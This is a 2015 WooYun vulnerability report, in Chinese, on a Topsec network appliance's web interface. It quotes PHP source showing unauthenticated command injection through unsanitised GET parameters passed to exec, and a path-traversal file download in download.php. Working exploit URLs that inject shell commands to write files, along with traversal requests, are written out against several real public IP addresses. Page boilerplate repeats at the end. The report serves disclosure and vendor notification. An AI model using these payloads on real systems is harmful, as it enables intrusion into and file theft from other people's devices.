天融信某系统前台无需登录命令执行多处及任意文件下载

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117616

漏洞标题：天融信某系统前台无需登录命令执行多处及任意文件下载

漏洞作者：路人甲

提交时间：2015-06-02 11:54

修复时间：2015-09-02 17:06

公开时间：2015-09-02 17:06

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-02：细节已通知厂商并且等待厂商处理中
2015-06-04：厂商已经确认，细节仅向厂商公开
2015-06-07：细节向第三方安全合作伙伴开放
2015-07-29：细节向核心白帽子及相关领域专家公开
2015-08-08：细节向普通白帽子公开
2015-08-18：细节向实习白帽子公开
2015-09-02：细节向公众公开

简要描述：

详细说明：

redial_pppoe.php：

<?php 
require_once dirname(__FILE__)."/../common/appexConfigInterface.inc";
$appexInterface = new AppexConfigInterface();
$wanName = $_GET['wan'];
$appexInterface->ifDownInterface($wanName);
$appexInterface->ifUpInterface($wanName);
?>

第一处:
ifDownInterface

private $ifDownCmdFormat = "/sbin/ifdown %s > /dev/null";
................................
public function ifDownInterface($ifName){		
		$command = sprintf ( $this->ifDownCmdFormat, $ifName );
		//echo ($command);
		execute ( $command );
	}

第二处

private $ifUpCmdFormat = "/sbin/ifup %s > /dev/null";
...................
public function ifUpInterface($ifName){			
		$command = sprintf ( $this->ifUpCmdFormat, $ifName );
		//echo ($command);
		execute ( $command );
	}

http://218.206.217.19:8080/acc/network/redial_pppoe.php?wan= | echo wooyun > d.php |
访问:http://218.206.217.19:8080/acc/network/d.php 即可
第三处：
check_interface_stat.php：

<?php 
include_once dirname(__FILE__).'/common/commandWrapper.inc';
header('Cache-Control: no-cache');
header('Pragma: no-cache');
header('Expires: ' . gmdate(DATE_RFC1123, time()-1));
$eth = $_GET['eth'];
$cmd = "ifconfig ".$eth." up";	
exec($cmd );
$linkStatArray = getLinkStat($eth );
$linkStat = "";
if (strpos ( $eth, "ppp" ) > - 1) {
	if(count($linkStatArray)>1){
		if($linkStatArray[3]=="yes"){
			$linkStat = " Connected ";	
		}else{
			$linkStat = " Not Connected";
		}
	  }			
	
	}else{
	  if(count($linkStatArray)>1){
		if($linkStatArray[3]=="yes"){
			$linkStat = " Speed: ".$linkStatArray[0]." | Duplex: ".$linkStatArray[1]." | Auto-negotiation: ".$linkStatArray[2];	
		}else{
			$linkStat = " Not Connected";
		}
	  }									  
}								 
?>

http://218.206.217.19:8080/acc/network/interface/check_interface_stat.php?eth= | echo wooyun > h.php |
访问:http://218.206.217.19:8080/acc/network/interface/h.php 即可
第四处：
fdisk_action.php:

<?php 
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
$action = $_GET['action'];
$diskname = $_GET['diskname'];
$setTosize= $_GET['setTosize'];
if($action=="1"){
	fdiskSD($diskname,$setTosize);
}
?>

跟进fdiskSD

function fdiskSD($disk,$size){
	
	$command = " fdisk -l | grep ".$disk."2";
	$result = execute($command);
	$infoArr = $result->get('output');
	if(count($infoArr)==0){
		$command = "echo -e 'd\n1\nd\nw\nq\n' | fdisk ".$disk." ";
		$result = execute($command);
		sleep(1);
		$command = "echo -e 'p\nq\n' | fdisk ".$disk;
		$result = execute($command);
		sleep(1);
		$allInfoArr = $result->get('output');
		$tmpArr = split("[ ]+",$allInfoArr[3] );
		$diskBlockSize = $tmpArr[4];
		$sda2Size=$diskBlockSize/100*$size;
		echo $diskBlockSize."---".$sda2Size;
		$command = "/tmp/appexcfg/bin/fdisk ".$disk." ".$sda2Size." >/dev/null & ";
		execute($command);
	}else{
		$command = "echo -e 'p\nq\n' | fdisk ".$disk;
		$result = execute($command);
		$allInfoArr = $result->get('output');
		sleep(1);
		$tmpArr = split("[ ]+",$allInfoArr[3] );
		$diskBlockSize = $tmpArr[4];
		$sda2Size=$diskBlockSize/100*$size;
		$command = "/tmp/appexcfg/bin/fdisk ".$disk." ".$sda2Size." >/dev/null & ";
		execute($command);
	}
	
}

url:
http://218.206.217.19:8080/acc/fdisk/fdisk_action.php?action=1&diskname=1 | echo wooyun > k.php | &setTosize=10
访问：
http://218.206.217.19:8080/acc/fdisk/k.php 即可
static_restart_arp_action.php:

$networkDAO = new NetworkDao();
$ethName = "";
if(isset($_REQUEST['ethName'])){
	$ethName = $_REQUEST['ethName'];
	
}
$isRestart="0";
if(isset($_REQUEST['isRestart'])){
	$isRestart = $_REQUEST['isRestart'];
	
}
$macFilterEnable= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterEnable");
$macFilterFixed= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterFixed");
$macFilterAllowOthers= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterAllowOthers");
$macDhcpEnable= $networkDAO->getNetworkConfigItemValue($ethName,"macDhcpEnable");
$macFilter="0";
$lanIfs = $networkDAO->getNetworkConfigItemValue("routerlan","ifname");
$lanIfs = trim ( $lanIfs );
$lanNameArray = split ( '[ ]+', $lanIfs );
foreach ($lanNameArray as $lanName){
	$lanMacFilterEnable=$networkDAO->getNetworkConfigItemValue($lanName,"macFilterEnable");

跟进getNetworkConfigItemValue：

class NetworkDao extends UCIBaseDao{
	
	public function setNetworkConfigItemValue($config,$option,$value){
		parent::set("network",$config,$option,$value);
	}
	
	public function setNetworkConfigValue($config,$value){
		parent::setConfig("network",$config,$value);
	}
	
	public function getNetworkConfigItemValue($config,$option){		
		$result = parent::get("network",$config,$option);
		return 	$result;
	}

再跟进父类:

class UCIBaseDao{
	
	
	public function set($package,$config,$option,$value){
		$cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";
		exec($cmd);
	}
	
	public function setConfig($package,$config,$value){
		$cmd = UCI_CMD." set ".$package.".".$config."=".$value;
		exec($cmd);
	}
	
	public function commit($package){
		//$cmd = UCI_CMD." commit ";
		$cmd = UCI_CMD." commit ".$package;
		exec($cmd);
	}
	
	public function get($package,$config,$option){
		$cmd = UCI_CMD." get ".$package.".".$config.".".$option;	
		$result = exec($cmd);
		return 	$result;
	}

这里没有对config 和 option做过滤导致命令执行
http://218.206.217.19:8080/acc/bindipmac/static_restart_arp_action.php?ethName= | echo wooyun > l.php |
访问url:http://218.206.217.19:8080/acc/bindipmac/l.php 即可
下来看第二处
static_arp.php:

<?php
error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
include_once dirname(__FILE__).'/../common/uiResources.inc';
require_once dirname(__FILE__).'/../common/appexConfigInterface.inc';
require_once dirname(__FILE__).'/../common/config/dao/engineInterfaceDao.inc';
require_once dirname(__FILE__).'/../common/config/dao/arpDao.inc';
require_once dirname(__FILE__).'/../common/config/model/appexEngineInterfaceModel.inc';
require_once dirname(__FILE__).'/../common/config/dao/dhcpInterfaceDao.inc';
include_once dirname(__FILE__).'/../common/commandWrapper.inc';
require_once dirname ( __FILE__ ) . "/../common/UciUtil.inc";
require_once dirname ( __FILE__ ) . "/../common/config/uci/dao/networkDao.inc";
header('Cache-Control: no-cache');
header('Pragma: no-cache');
header('Expires: ' . gmdate(DATE_RFC1123, time()-1));
$arpDao = new ARPDao();
$ethName = "";
if(isset($_GET['ethName'])){
	$ethName = $_GET['ethName'];
	
}
$engineInterfaceDao = new EngineInterfaceDao();
$lanEngineIf = $engineInterfaceDao->getIfConfigForIfname($ethName);	
$ifName = $ethName; 
$networkDAO = new NetworkDao();
$macFilterEnable= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterEnable");
$macFilterFixed= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterFixed");
$macFilterAllowOthers= $networkDAO->getNetworkConfigItemValue($ethName,"macFilterAllowOthers");
$macDhcpEnable= $networkDAO->getNetworkConfigItemValue($ethName,"macDhcpEnable");
$visitNum = date('YjnHis');
?>

这里有2处
getIfConfigForIfname
getNetworkConfigItemValue
跟进第一个：

public function getIfConfigForIfname($ifname) {
		$networkDAO = new NetworkDao ( );
		$engineInterfaceModel = new AppExEngineInterfaceModel ( );
		$engineInterfaceModel->setName($ifname);
		$engineInterfaceModel->setDns($networkDAO->getNetworkConfigItemValue ( $ifname, "dns" ));
		$engineInterfaceModel->setGetway($networkDAO->getNetworkConfigItemValue ( $ifname, "gateway" ));
		$engineInterfaceModel->setIfAlias($networkDAO->getNetworkConfigItemValue ( $ifname, "alias" ));
		$engineInterfaceModel->setIfAutoNeg($networkDAO->getNetworkConfigItemValue ( $ifname, "autoneg" ));
		$engineInterfaceModel->setIfDuplex($networkDAO->getNetworkConfigItemValue ( $ifname, "duplex" ));
		$engineInterfaceModel->setIfName($networkDAO->getNetworkConfigItemValue ( $ifname, "ifname" ));
		$engineInterfaceModel->setIfSpeed($networkDAO->getNetworkConfigItemValue ( $ifname, "speed" ));
		$engineInterfaceModel->setIfType($networkDAO->getNetworkConfigItemValue ( $

最终还是跑到了这个getNetworkConfigItemValue 里面
原理不多分析了
http://61.54.222.33:8080
http://61.148.24.182:8080/
http://61.54.222.39:8080/
http://61.148.24.182:8080
任意文件下载
download.php:

<?php
	$file = $_REQUEST['f'];
	if(!file_exists('/www/cert/'))
		mkdir('/www/cert/');
	if(!file_exists("/www/cert/$file"))
		copy("/etc/easy-rsa/keys/$file", "/www/cert/$file");
		
	header('Content-type: application/x-msdownload');
	header('Content-Disposition: attachment; filename="' . $file . '"');
	readfile("/www/cert/$file");
?>

只要文件存在就不走里面的copy
http://61.54.222.33:8080/acc/vpn/download.php?f=../index.php
http://61.148.24.182:8080/acc/vpn/download.php?f=../index.php
http://61.54.222.39:8080/acc/vpn/download.php?f=../index.php
http://61.148.24.182:8080/acc/vpn/download.php?f=../index.php
http://218.206.217.19:8080/acc/vpn/download.php?f=../index.php

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2015-06-04 17:05

厂商回复：

已经收到其它网站漏洞报送，谢谢关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117616

漏洞标题：天融信某系统前台无需登录命令执行多处及任意文件下载

相关厂商：天融信

漏洞作者：路人甲

提交时间：2015-06-02 11:54

修复时间：2015-09-02 17:06

公开时间：2015-09-02 17:06

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117616

漏洞标题：天融信某系统前台无需登录命令执行多处及任意文件下载

相关厂商：天融信

漏洞作者： 路人甲

提交时间：2015-06-02 11:54

修复时间：2015-09-02 17:06

公开时间：2015-09-02 17:06

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117616"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云